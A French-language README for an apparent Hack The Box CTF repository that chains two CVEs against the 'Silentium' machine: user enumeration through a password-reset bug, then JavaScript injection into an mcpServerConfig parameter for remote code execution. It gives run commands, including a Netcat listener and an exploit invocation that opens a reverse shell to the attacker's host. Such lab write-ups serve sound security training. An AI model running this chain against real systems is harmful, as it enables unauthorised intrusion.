
Exploitation Silentium HTB-CTF
Ce dépôt contient la chaîne d'exploitation complète pour la machine Silentium sur Hack The Box. L'exploit exploite une vulnérabilité en deux étapes impliquant l'énumération d'utilisateurs et l'injection JavaScript pour obtenir une exécution de code à distance (RCE).
La chaîne de vulnérabilité consiste en une faille de divulgation d'informations et une injection de code critique. En énumérant d'abord les utilisateurs valides via un bogue de réinitialisation de mot de passe, nous obtenons le contexte nécessaire pour cibler le point de terminaison customMCP. La RCE est obtenue en injectant une fonction JavaScript malveillante dans le paramètre mcpServerConfig, qui est exécutée par le backend Node.js.
Vous devez avoir Python 3 et Bash installés, ainsi que la bibliothèque suivante :
pip install requests
Exécutez le script d'énumération (Bash) pour trouver les comptes valides (nécessite users.txt) :
python3 CVE-2025-58434.py
Sur votre machine locale, démarrez un écouteur Netcat :
nc -lvnp 4444
Exécutez le script Python en fournissant la cible, votre IP et la clé API obtenue :
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
| Argument | Description | Requis |
|---|---|---|
| -t, --target | Hôte cible | Oui |
| -k, --key | Jeton Bearer API | Oui |
| -l, --lhost | Votre IP d'écouteur (VPN) | Oui |
| -p, --lport | Votre port d'écouteur | Oui |
Ce script est destiné à des fins éducatives et aux tests de pénétration autorisés uniquement dans le cadre d'environnements CTF. Accéder ou attaquer des cibles sans autorisation préalable est illégal.
Défi : Silentium (Hack The Box)
CVE : CVE-2025-58434 | CVE-2025-59528